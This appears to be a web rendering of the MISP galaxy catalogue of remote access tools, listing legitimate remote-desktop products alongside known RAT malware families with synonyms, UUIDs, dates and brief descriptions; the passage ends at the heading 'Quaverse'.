Loki RAT is a php RAT that means no port forwarding is needed for this RAT, If you dont know how to setup this RAT click on tutorial.

Internal MISP references

UUID 70e6875b-34b5-4f97-8403-210defbc040d which can be used as unique global reference for Loki RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

MLRat

Internal MISP references

UUID 83929545-ef07-469c-ab55-c59155a66cc6 which can be used as unique global reference for MLRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SpyCronic

Internal MISP references

UUID 71289654-0217-44d7-8762-b609b3eace80 which can be used as unique global reference for SpyCronic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Internal MISP references

UUID bdb420be-5882-41c8-b439-02bbef69d83f which can be used as unique global reference for Pupy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

Internal MISP references

UUID eea78fd1-11ae-432a-9422-d5e774eb8ff2 which can be used as unique global reference for Nova in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

BD Y3K RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BD Y3K RAT.

Known Synonyms
Back Door Y3K RAT
Y3k
Internal MISP references

UUID 62f8b6aa-f3df-4789-9348-b16db59f345e which can be used as unique global reference for BD Y3K RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

Internal MISP references

UUID 29f7cf0f-b422-4966-9298-c8b4cb54deac which can be used as unique global reference for Turkojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2003

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

Internal MISP references

UUID c9fd50a0-35c8-4dfd-baeb-8043182e864c which can be used as unique global reference for TINY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SharK

sharK is an advanced reverse connecting, firewall bypassing remote administration tool written in VB6. With sharK you will be able to administrate every PC (using Windows OS) remotely.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SharK.

Known Synonyms
SHARK
Shark
Internal MISP references

UUID ff471870-7c9a-4122-ba89-489fc819660b which can be used as unique global reference for SharK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008
Related clusters

To see the related clusters, click here.

Snowdoor

Backdoor.Snowdoor is a Backdoor Trojan Horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5,328.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snowdoor.

Known Synonyms
Backdoor.Blizzard
Backdoor.Fxdoor
Backdoor.Snowdoor
Backdoor:Win32/Snowdoor
Internal MISP references

UUID ed4590cd-d636-46bc-a92d-d90b9548db51 which can be used as unique global reference for Snowdoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Paradox

Internal MISP references

UUID 5d4123f6-c344-45ee-83e9-c5656d38e604 which can be used as unique global reference for Paradox in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SpyNote

Android RAT

Internal MISP references

UUID ea727e26-b3de-44f8-86c5-11a912c7a8aa which can be used as unique global reference for SpyNote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

ZOMBIE SLAYER

Internal MISP references

UUID b7b6db54-db6a-463c-a2a2-3a0da1f7fe32 which can be used as unique global reference for ZOMBIE SLAYER in MISP communities and other software using the MISP galaxy

HTTP WEB BACKDOOR

Internal MISP references

UUID 69b002ee-1be8-44e2-9295-8299b97a5773 which can be used as unique global reference for HTTP WEB BACKDOOR in MISP communities and other software using the MISP galaxy

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone's doing - without leaving your desk. Monitor the activity of all employees. Plus you can share your screen with your employees PCs, making demos and presentations much easier.

Internal MISP references

UUID 376671ff-2131-4150-b1f4-7870f6adf8ae which can be used as unique global reference for NET-MONITOR PRO in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DameWare Mini Remote Control.

Known Synonyms
dameware
Internal MISP references

UUID ba157c90-8f94-45f2-8395-001e76eee506 which can be used as unique global reference for DameWare Mini Remote Control in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.

Internal MISP references

UUID 903846e2-5fa7-42c9-98bf-00d05473c9e3 which can be used as unique global reference for Remote Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Ammyy Admin

Ammyy Admin is a completely portable remote access program that's extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ammyy Admin.

Known Synonyms
Ammyy
Internal MISP references

UUID 9025f09b-a3fe-4711-89b8-bee6037681f8 which can be used as unique global reference for Ammyy Admin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011

Ultra VNC

UltraVNC works a bit like Remote Utilities, where a server and viewer is installed on two PCs, and the viewer is used to control the server.

Internal MISP references

UUID 12f03025-467b-49b3-ba7b-2a152e38eae5 which can be used as unique global reference for Ultra VNC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.

Internal MISP references

UUID 6dd8f7ac-a90b-4155-843d-b95f1f4e0e81 which can be used as unique global reference for AeroAdmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

Internal MISP references

UUID 07c792c4-2f78-4eba-a6a3-3ba28e098886 which can be used as unique global reference for Windows Remote Desktop in MISP communities and other software using the MISP galaxy

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You're only allowed one connection (unless you upgrade) but for many of you, that'll be just fine.

Internal MISP references

UUID e4ae4f4e-a751-4633-a54e-c747508ff3b8 which can be used as unique global reference for RemotePC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that's absolutely perfect for on-demand, instant support.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Seecreen.

Known Synonyms
Firnass
Internal MISP references

UUID b9df1fb3-17b7-430b-8c23-f1d321c1265c which can be used as unique global reference for Seecreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you setup a computer for remote access from any other Chrome browser.

Internal MISP references

UUID 6583d982-a5cb-47e0-a3b0-bc18cadaeb53 which can be used as unique global reference for Chrome Remote Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

Internal MISP references

UUID 7d71d21e-68f0-4595-beee-7c353471463d which can be used as unique global reference for AnyDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

LiteManager

LiteManager is another remote access program, and it's strikingly similar to Remote Utilities, which I explain on the first page of this list. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

Internal MISP references

UUID 0c8a877b-6c9c-43a7-9688-d90a098d8710 which can be used as unique global reference for LiteManager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

Internal MISP references

UUID 9b990bc7-ff88-4658-90de-806711462c55 which can be used as unique global reference for Comodo Unite in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

ShowMyPC

ShowMyPC is a portable and free remote access program that's nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

Internal MISP references

UUID 185adc84-ad02-4559-aacc-50b2d690640c which can be used as unique global reference for ShowMyPC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

Internal MISP references

UUID 204b457d-9729-460b-991b-943171c55fa7 which can be used as unique global reference for join.me in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

Internal MISP references

UUID 82a2bcba-0f31-4a45-bddb-559db9819fad which can be used as unique global reference for DesktopNow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter's screen.

Internal MISP references

UUID a31bf7d6-70a9-4f5f-a38e-88e173ad444c which can be used as unique global reference for BeamYourScreen in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Casa RAT

Internal MISP references

UUID ef164438-e4bd-4c56-a8e6-e5e64bc8dd5a which can be used as unique global reference for Casa RAT in MISP communities and other software using the MISP galaxy

Bandook RAT

Bandook is a FWB#++ reverse connection rat (Remote Administration Tool), with a small size server when packed 30 KB, and a long list of amazing features

Internal MISP references

UUID 3482922d-b58c-482f-8363-f63f52fcdb43 which can be used as unique global reference for Bandook RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005

Cerberus RAT

Internal MISP references

UUID 180145d0-f4e3-4ab3-b5bb-ce17f7fec0db which can be used as unique global reference for Cerberus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2009

Syndrome RAT

Internal MISP references

UUID db9bcc9a-27ec-4a58-a481-d978b4954ad7 which can be used as unique global reference for Syndrome RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Snoopy

Snoopy is a Remote Administration Tool. Software for controlling user computer remotely from other computer on local network or Internet.

Internal MISP references

UUID fffbcd87-f028-4c4a-9e94-312e4e954450 which can be used as unique global reference for Snoopy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

5p00f3r.N$ RAT

Internal MISP references

UUID f592c850-4867-4fa1-a303-151b953710d7 which can be used as unique global reference for 5p00f3r.N$ RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

P. Storrie RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular P. Storrie RAT.

Known Synonyms
P.Storrie RAT
Internal MISP references

UUID 9287c2db-99e6-4d3b-bb32-3054e2e96e39 which can be used as unique global reference for P. Storrie RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2011

xHacker Pro RAT

Internal MISP references

UUID 832dad3c-6483-4d3c-ad02-8336dea90682 which can be used as unique global reference for xHacker Pro RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2007

NetDevil

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

Internal MISP references

UUID 281563d8-14f8-43a8-a0cb-2f0198f7146c which can be used as unique global reference for NetDevil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

NanoCore

In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

Internal MISP references

UUID 6c3c111a-93af-428a-bee0-feacbee0237d which can be used as unique global reference for NanoCore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Cobian RAT

The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family

Internal MISP references

UUID 8c49da10-2b59-42c4-81e6-75556decdecb which can be used as unique global reference for Cobian RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

To see the related clusters, click here.

Netsupport Manager

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

Internal MISP references

UUID d6fe0674-f55b-46ea-bf87-78fa0fa6ac97 which can be used as unique global reference for Netsupport Manager in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1989

VorteX

Internal MISP references

UUID 2a47361d-584b-493f-80a4-37c74c30cf1b which can be used as unique global reference for VorteX in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 1998

Assassin

Internal MISP references

UUID eac2e921-d71e-45fd-abff-4902968f910d which can be used as unique global reference for Assassin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2002

Net Devil

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Net Devil.

Known Synonyms
NetDevil
Internal MISP references

UUID 2be434d3-03df-4236-9e7e-130c2efa8b33 which can be used as unique global reference for Net Devil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002
Related clusters

To see the related clusters, click here.

A4Zeta

Internal MISP references

UUID 9a0b6acf-e913-446a-a4cd-35eb9046febe which can be used as unique global reference for A4Zeta in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Greek Hackers RAT

Internal MISP references

UUID 77e7ad24-3412-4536-ae4c-1971317f4231 which can be used as unique global reference for Greek Hackers RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

MRA RAT

Internal MISP references

UUID de4974d1-1a1b-4a67-835b-172ebbdcfafd which can be used as unique global reference for MRA RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

Sparta RAT

Internal MISP references

UUID c1086221-a498-4ec9-ac33-85e4790136ae which can be used as unique global reference for Sparta RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2002

LokiTech

Internal MISP references

UUID ff97af70-011c-4d7c-9ae6-1e41ea5dfc12 which can be used as unique global reference for LokiTech in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2003

MadRAT

Internal MISP references

UUID 5c65f5ec-c629-4d12-9078-08a4bb7522eb which can be used as unique global reference for MadRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2002

Tequila Bandita

Internal MISP references

UUID 831879d3-5492-46b1-b174-491e6b413232 which can be used as unique global reference for Tequila Bandita in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

Toquito Bandito

Internal MISP references

UUID 79861bda-8c72-4b90-876e-854b9daf32eb which can be used as unique global reference for Toquito Bandito in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004

MofoTro

MofoTro is a new rat coded by Cool_mofo_2.

Internal MISP references

UUID fa0a7929-3876-4866-9c01-a5d168379816 which can be used as unique global reference for MofoTro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2006

Hav-RAT

Written in Delphi

Internal MISP references

UUID 3a2176f2-138d-4939-958c-70992abddca3 which can be used as unique global reference for Hav-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

ComRAT

ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.

Internal MISP references

UUID 9223bf17-7e32-4833-9574-9ffd8c929765 which can be used as unique global reference for ComRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007
Related clusters

To see the related clusters, click here.

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

Internal MISP references

UUID d8aad68d-a68f-42e1-b755-d5f383b73401 which can be used as unique global reference for 4H RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007
Related clusters

To see the related clusters, click here.

Darknet RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Darknet RAT.

Known Synonyms
Dark NET RAT
Internal MISP references

UUID ba285e93-d330-4efc-ad00-a84433575e2c which can be used as unique global reference for Darknet RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2007

CIA RAT

Internal MISP references

UUID b82d0ec7-3918-4252-9c8f-b4d17b14c596 which can be used as unique global reference for CIA RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

Minimo

Internal MISP references

UUID 71a72669-4d7b-49a5-95a3-bbefbb2152bf which can be used as unique global reference for Minimo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

miniRAT

Internal MISP references

UUID 2b640955-05d4-46f7-9b34-c697f4e927e4 which can be used as unique global reference for miniRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

Pain RAT

Internal MISP references

UUID 17958627-0c27-4536-8839-5c91d51866bc which can be used as unique global reference for Pain RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2008

PlugX

PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PlugX.

Known Synonyms
Korplug
SOGU
Scontroller
Internal MISP references

UUID 663f8ef9-4c50-499a-b765-f377d23c1070 which can be used as unique global reference for PlugX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2005 or 2008
Related clusters

To see the related clusters, click here.

UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

Internal MISP references

UUID 41d4b98f-8ec2-4e8d-938c-42a776b422ee which can be used as unique global reference for UNITEDRAKE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008

MegaTrojan

Written in Visual Basic

Internal MISP references

UUID 4c053709-5349-4630-8462-dde28c8433eb which can be used as unique global reference for MegaTrojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008

Venomous Ivy

Internal MISP references

UUID 9b5eb899-fc44-43f5-9a28-cdac4bc6a784 which can be used as unique global reference for Venomous Ivy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2009

Xploit

Internal MISP references

UUID 286fc965-b019-49b1-937c-740b95a368bb which can be used as unique global reference for Xploit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Arctic R.A.T.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arctic R.A.T..

Known Synonyms
Artic
Internal MISP references

UUID 3ff21b18-8be5-45fd-9d42-d5ab9dddfa4c which can be used as unique global reference for Arctic R.A.T. in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

GOlden Phoenix

Internal MISP references

UUID 422ff7d4-0106-4e87-8eae-8cbd6c789540 which can be used as unique global reference for GOlden Phoenix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

GraphicBooting

Internal MISP references

UUID 06b18c56-0894-4bca-a373-21e1576ddd7c which can be used as unique global reference for GraphicBooting in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Pocket RAT

Internal MISP references

UUID 76313bca-2551-4f0c-b427-e413cbb728b0 which can be used as unique global reference for Pocket RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Erebus

Internal MISP references

UUID ee73e375-3ac2-4ce0-b24b-74fd82d52864 which can be used as unique global reference for Erebus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010
Related clusters

To see the related clusters, click here.

SharpEye

Internal MISP references

UUID c42394f8-5f35-4797-9393-8289ab8ad3ad which can be used as unique global reference for SharpEye in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Archelaus Beta

Internal MISP references

UUID ccd38085-f3bc-4fb0-ae24-99a45964dd8e which can be used as unique global reference for Archelaus Beta in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

BlackHole

C# RAT (Remote Adminitration Tool) - Educational purposes only

Internal MISP references

UUID 2ea1f494-cf18-49fb-a043-36555131dd7c which can be used as unique global reference for BlackHole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters

To see the related clusters, click here.

Vanguard

Internal MISP references

UUID 9de3e8d7-c501-4926-a82f-6e147d66c06d which can be used as unique global reference for Vanguard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Ahtapod

Internal MISP references

UUID dd2c3283-095d-4895-85cd-6a01e0616968 which can be used as unique global reference for Ahtapod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

Internal MISP references

UUID 6ac125c8-6f00-490f-a43b-30b36d715431 which can be used as unique global reference for FINSPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Seed RAT

Seed is a firewall bypass plus trojan, injects into default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger and full trojans, or even making Seed download them somewhere. Has computer info, process manager, file manager, with download, create folder, delete, execute and upload. And a remote download function. Everything with a easy to use interface, reminds an instant messenger.

Internal MISP references

UUID 4c0ec00c-7fd4-4d8b-b1c9-6a12035fe992 which can be used as unique global reference for Seed RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004 or 2011

SharpBot

Internal MISP references

UUID 126d167b-c47e-42a5-91fa-5af157f6df30 which can be used as unique global reference for SharpBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2011

TorCT PHP RAT

Internal MISP references

UUID 14210ee4-e0bf-49f9-8d7a-13180dadda6b which can be used as unique global reference for TorCT PHP RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

A32s RAT

Internal MISP references

UUID 564dc473-e3a7-466b-afa0-591db218c05e which can be used as unique global reference for A32s RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Char0n

Internal MISP references

UUID 6faf9e5a-517f-4f7c-b720-7b7d537f65ef which can be used as unique global reference for Char0n in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Nytro

Internal MISP references

UUID 25d23e76-72b1-4d47-9c80-9610a91e4945 which can be used as unique global reference for Nytro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Syla

Internal MISP references

UUID bcbe2297-5ebf-48fe-936c-6f850f23383c which can be used as unique global reference for Syla in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

Internal MISP references

UUID ca44dd5e-fd9e-48b5-99cb-0b2629b9265f which can be used as unique global reference for Cobalt Strike in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sakula.

Known Synonyms
Sakurel
VIPER
Internal MISP references

UUID 3eca2d5f-41bf-4ad4-847f-df18befcdc44 which can be used as unique global reference for Sakula in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

Internal MISP references

UUID 12bb8f4f-af29-49a0-8c2c-d28468f28fd8 which can be used as unique global reference for hcdLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Crimson

Internal MISP references

UUID 8d8efbc6-d1b7-4ec8-bab3-591edba337d0 which can be used as unique global reference for Crimson in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

KjW0rm

Internal MISP references

UUID a7bffc6a-5b47-410b-b039-def16050adcb which can be used as unique global reference for KjW0rm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters

To see the related clusters, click here.

Ghost

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghost.

Known Synonyms
Ucul
Internal MISP references

UUID 22f43398-47b2-4851-866a-b9ed0d355bf2 which can be used as unique global reference for Ghost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013

9002

Internal MISP references

UUID 21029a2d-85d7-40d0-9b87-8e8c414bf470 which can be used as unique global reference for 9002 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2013

Sandro RAT

Internal MISP references

UUID ad630149-e7d4-4ca0-9877-ef37743d00a3 which can be used as unique global reference for Sandro RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

Mega

Internal MISP references

UUID d0d7dc33-1c12-4a5a-b421-79f4761bd1b1 which can be used as unique global reference for Mega in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

WiRAT

Internal MISP references

UUID af66d0c1-15c9-4a0b-b0cc-4208914707e6 which can be used as unique global reference for WiRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

3PARA RAT

Internal MISP references

UUID 59fb0222-0e7d-4f5f-92ac-e68012fb927d which can be used as unique global reference for 3PARA RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

BBS RAT

Internal MISP references

UUID 6e754ac7-0ffb-4510-9f70-4b74ab7bc868 which can be used as unique global reference for BBS RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

Konni

KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As Part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Konni.

Known Synonyms
KONNI
Internal MISP references

UUID 5b930a23-7d88-481f-8791-abc7b3dd93d2 which can be used as unique global reference for Konni in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Felismus RAT

Used by Sowbug

Internal MISP references

UUID 1a35d040-1e0e-402b-8174-43e5c3c81922 which can be used as unique global reference for Felismus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

Xsser

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user's device and executes remote commands as directed by its command-and-control (C2) server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xsser.

Known Synonyms
mRAT
Internal MISP references

UUID b1abae3d-e1a1-4c50-a3b0-9509c594a600 which can be used as unique global reference for Xsser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

GovRAT

GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

Internal MISP references

UUID b6ddc2c6-5890-4c60-9b10-4274d1a9cc22 which can be used as unique global reference for GovRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Rottie3

Internal MISP references

UUID 2e44066e-bb4f-41f9-86d3-495f83df5195 which can be used as unique global reference for Rottie3 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Killer RAT

Internal MISP references

UUID 983d5ac0-2e26-4793-8bab-fce33ae4e46d which can be used as unique global reference for Killer RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2015

Hi-Zor

Internal MISP references

UUID d22a3e65-75e5-4970-b424-bdc06ec33dba which can be used as unique global reference for Hi-Zor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Quaverse

